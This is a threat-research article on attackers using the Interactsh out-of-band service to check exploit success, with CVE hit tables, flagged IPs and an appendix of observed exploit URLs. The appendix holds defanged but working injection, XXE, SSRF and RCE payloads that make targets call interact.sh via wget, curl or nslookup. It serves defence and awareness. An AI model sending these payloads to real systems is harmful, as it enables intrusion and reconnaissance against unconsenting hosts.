Figure 1 shows the GitHub page for the tool, stating that “Interactsh is an Open-Source Solution for Out of band Data Extraction, A tool designed to detect bugs that cause external interactions.” In the following experiment, we interact with the web UI, which is easily found by doing a web search on “interact project discovery.” When a user accesses the page, the web UI randomly generates an Interactsh link:

C4mqgxkyedf0000ar3d0gnkmaqayyyyyb[.]interact[.]sh

We interact with an Interactsh URL using a browser to check the query trace with the Interactsh UI.
Figure 2. Example of using Interactsh through the Web UI.

We interact with this URL using a browser to check the query trace with the Interactsh UI, as shown in Figure 2. The UI shows the DNS query records and HTTP request for the URL, which means we successfully accessed C4mqgxkyedf0000ar3d0gnkmaqayyyyyb[.]interact[.]sh. In addition, the URL can also be used in the command line if the interactsh-client is installed.

The Payload Interaction

Attackers and researchers can use this tool to test whether an exploit has been successful. Figure 3 shows such an example.

The tool can be used to test whether an exploit has been successful. The screenshot shows an example.
Figure 3. Example of using Interactsh.

We picked an exploit attempt which used the Interactsh tool – in this case, a Generic IoT Device Remote Command Execution Vulnerability. The attacker sends an HTTP post request and passes a command by key parameter in the post body. Here a wget command was used to access a command and control (C2) server, which was created via the Interactsh tool. By watching whether the C2 server receives the request, it can be determined whether this exploit was successful.

Exploits Leveraging Interactsh

This tool has already been actively used through ISP and company networks as early as April 18. We find that there are a lot of simple command injections through networks, which are related to specific CVEs. We observed a huge number of attempts, sent from a group of IP addresses and followed by the same URL, which do not seem to be a research project but rather a scanning event.

CVE Number Severity Category Hit Counts
CVE-2017-9506 Medium Server-Side Request Forgery (SSRF) 1,132
CVE-2017-12629 Critical Remote Code Execution 663
CVE-2019-2767 High Authentication Bypass (Insert Data) 192
CVE-2021-33544 High Remote Code Execution 163
CVE-2021-32819 High Remote Code Execution 51
CVE-2012-1301 Critical Server-Side Request Forgery (SSRF) 13
CVE-2018-1000600 High Server-Side Request Forgery (SSRF) 11
CVE-2021-27905 Critical Server-Side Request Forgery (SSRF) 9
CVE-2020-28188 Critical Remote Code Execution 7
CVE-2018-15517 High Server-Side Request Forgery (SSRF) 6
CVE-2009-4223 N/A PHP Remote File Inclusion  5
CVE-2019-18394 Critical Server-Side Request Forgery (SSRF) 5
CVE-2021-27886 Critical Remote Code Execution 3
CVE-2020-13379 High Server-Side Request Forgery (SSRF) 2

Table 1. Interactsh exploit hit ranking by CVEs.

We collected data from URL Filtering with PAN-DB from March 7-Sept. 7 and recorded around 32,200 Interactsh hits. Focusing on vulnerability/exploit attempts, table 1 ranks the CVEs the observed traffic most commonly attempted to exploit. This means the actors behind the traffic are using Interactsh API tools to test whether their exploit attempts succeed. Each unique Interactsh URL can be thought of as a C2. Most of the exploits for the same CVEs are using multiple randomly generated Interactsh domains and scanning on different host sides.

CVE Number Severity Category
CVE-2021-31755 Critical Remote Code Execution
CVE-2020-28871 Critical Remote Code Execution
CVE-2020-25223 Critical Remote Code Execution
CVE-2020-8813 High Remote Code Execution
CVE-2020-7247 Critical Remote Code Execution
CVE-2020-28188, CVE-2020-15568, CVE-2018-13354, CVE-2018-13338 Critical Remote Code Execution
CVE-2019-2616 High Authentication Bypass (Insert Data)
CVE-2018-16167 High Remote Code Execution
CVE-2018-14839 Critical Remote Code Execution
CVE-2016-1555 Critical Remote Code Execution

Table 2. Other CVEs leveraged by Interactsh.

From our soak site (an internal network monitoring tool), we also captured some Interactsh activity, shown in Table 2, which could raise awareness of active exploits attempts.

Interactsh Activity Distribution

We also found several DNS queries using Interactsh from Cortex Xpanse data. We found three suspicious IP addresses.

82[.]112[.]184[.]197 is flagged as potential malware in VirusTotal, and 138[.]68[.]184[.]23 is a phishing site. We also found 82[.]112[.]184[.]206, flagged malicious. All three of these IP addresses have a large volume of Interactsh activity.

We analyzed all the exploits we observed that used the Interactsh tool, starting from the time it went public. Though the tool has been available online since April, we noted increasing usage of the tool in June.

Exploits observed that used the Interactsh tool, starting from the time it went public in April.
Figure 4. Exploits activity distribution using the Interactsh tool.

Figure 5 shows the distribution of Interactsh activity in terms of more specific dates. Events shown on the chart could be an exploit or a single scanning action. The activity shown in Figure 5 corresponds with Figure 4, which shows increasing traffic in June.

Exploits observed that used the Interactsh tool, starting from the time it went public in April, charted in terms of more granular date ranges.
Figure 5. Interactsh activity distribution.

Figure 6 shows DNS queries with the Interactsh link, distributed by location. The United Kingdom ranks No. 1, followed by Ecuador and the U.S., which rank No. 2 and No. 3.

Observed Interactsh activity plotted in terms of location.
Figure 6. Interactsh activity location distribution.

Conclusion

Even though Interactsh can be used for legitimate purposes, it is widely used by attackers to test malicious traffic. Its testing traffic therefore could be followed by a series of exploits. The trend of using third-party open-source tools to test exploits has become more popular in the last few years. It is convenient for attackers to use open-source tools, and it is hard for defenders to simply block this traffic by services/IP/server etc. To help organizations defend against malicious exploits that originate this way, we need to raise awareness about the tool.

Palo Alto Networks Next-Generation Firewall customers who use Threat Prevention, Advanced URL Filtering, DNS Security and WildFire security subscriptions are protected against benign append attacks that use Interactsh. DNS Security has marked interact[.]sh as a malicious site.

We also recommend the following actions:

  • Run a Best Practice Assessment to identify where your configuration could be altered to improve your security posture.
  • Continuously update your Next-Generation Firewalls with the latest Palo Alto Networks Threat Prevention content (e.g. versions 8467 and above).

Use Case Examples: Exploits Leveraging Interactsh

hxxp[:]//ip-addr/uapi-cgi/certmngr[.]cgi?action=createselfcert&local=anything&country=aa&state=$(wget hxxp[:]//c44s021vkr17popa98agcrrhyneyyyd7c[.]interact.sh)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything
(CVE-2021-33544)

hxxp[:]//ip-addr/securityrealm/user/admin/descriptorbyname/org.jenkinsci.plugins.github.config[.]githubtokencredentialscreator/createtokenbypassword?apiurl=hxxp[:]//c4b14uqjfg5t9muoh3pgcrca3hoyfrbcr[.]interact.sh
(CVE-2018-1000600)

hxxp[:]//ip-addr/xmlpserver/convert?xml=<?xml+version="1.0"+?><!doctype+r+[<!element+r+any+><!entity+%+sp+system+"hxxp[:]//c38r5fq23aksk1ma690gcdmc6doyyahck[.]interact.sh/xxe.xml">%sp;%param1;]>&_xf=excel&_xl=123&template=123
(CVE-2019-2767)

hxxp[:]//ip-addr/solr/select?qt=/config#&&shards=127.0.0.1:8984/solq&stream.body={"add-listener":{"event":"postcommit","name":"nuclei","class":"solr.runexecutablelistener","exe":"sh","dir":"/bin/","args":["-c","$@|sh",".","echo","nslookup","$(whoami).c38at9vk6tb1j2mah7i0cdeca5yyybucs[.]interact.sh"]}}&wt=json&isshard=true&q=apple

hxxp[:]//ip-addr/search?q={!xmlparser v="<!doctype a system hxxp[:]//c3167tzyedf0000sfc2ggbo7zoeyyyyyp[.]interact.sh/solr/gettingstarted/upload?stream.body={"xx":"yy"}&commit=true""><a></a>"}
(CVE-2017-12629)

hxxp[:]//ip-addr/solr/db/replication?command=fetchindex&masterurl=hxxp[:]//c3167tzyedf0000sfc2ggboug8cyyyyyb[.]interact.sh:80/xxxx&wt=json&httpbasicauthuser=aaa&httpbasicauthpassword=bbb
(CVE-2021-27905)

hxxp[:]//ip-addr/?defaultFilter=e')); let require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('curl c32s61pbq16mga0vler0cdnhgbayyyyyn[.]interact.sh');
(CVE-2021-32819)

hxxp[:]//ip-addr/plugins/servlet/oauth/users/icon-uri?consumeruri=hxxp[:]//c33mg9s2ndhfbpsj7legcddsomayyyypg[.]interact.sh
(CVE-2017-9506)

hxxp[:]//ip-addr/index.php/system/mailconnect/host/c4b14uqjfg5t9muoh3pgcrqz7oyykqcuq[.]interact.sh/port/80/secure
(CVE-2018-15517)

hxxp[:]//ip-addr/api/container/command?container=&command=;curl hxxp[:]//c44h3el4f1mfla5idm10crrtxqyyyjpp4[.]interact.sh
(CVE-2021-27886)

hxxp[:]//ip-addr/avatar/test?d=redirect.rhynorater.com?;/bp.blogspot.com/c3jrcoqkfbhrf4rcsmr0cdu5taayynuze[.]interact.sh
(CVE-2020-13379)

hxxp[:]//ip-addr/adm/krgourl.php?document_root=hxxp[:]//c45luqovk0lir2vett1gcrf4iyayy468g[.]interact.sh
(CVE-2009-4223)

hxxp[:]//ip-addr/umbraco/feedproxy.aspx?url=hxxp[:]//c3qsfdg4hl24te8g7rc0cd9erqyygmui6[.]interact.sh
(CVE-2012-1301)

hxxp[:]//ip-addr/getfavicon?host=hxxp[:]//c3uhg4emp8vt8fqq370gcd6th6ayyy4b6[.]interact.sh
(CVE-2019-18394)

 (CVE-2020-7247)

(CVE-2020-7247)

 (CVE-2018-16167)

(CVE-2018-16167)

(CVE-2021-31755)

(CVE-2016-1555)

(CVE-2019-2616)

(CVE-2018-14839)

(CVE-2020-8813)

(CVE-2020-8813)

(CVE-2020-28188 CVE-2018-13354 CVE-2018-13338 CVE-2020-15568)

(CVE-2020-28188 CVE-2018-13354 CVE-2018-13338 CVE-2020-15568)

(CVE-2020-28871)

(CVE-2020-25223)

hxxp[:]//ip-addr/rest/sharelinks/1.0/link?url=hxxps[:]//c37e7sraa1psb1c2nso0cd8o9eyyyn94w[.]interact.sh

hxxp[:]//ip-addr/search.php?search=";wget+hxxp[:]//c4b14uqjfg5t9muoh3pgcrcwtheyrjn8k[.]interact.sh';"

hxxp[:]//ip-addr/index.php?plot=;wget hxxp[:]//c4bfibtmh0e03d1t5u90crcb9fayzf9dr[.]interact.sh

Text extracted automatically; images, tables and formatting may be missing. Original: https://unit42.paloaltonetworks.com/exploits-interactsh/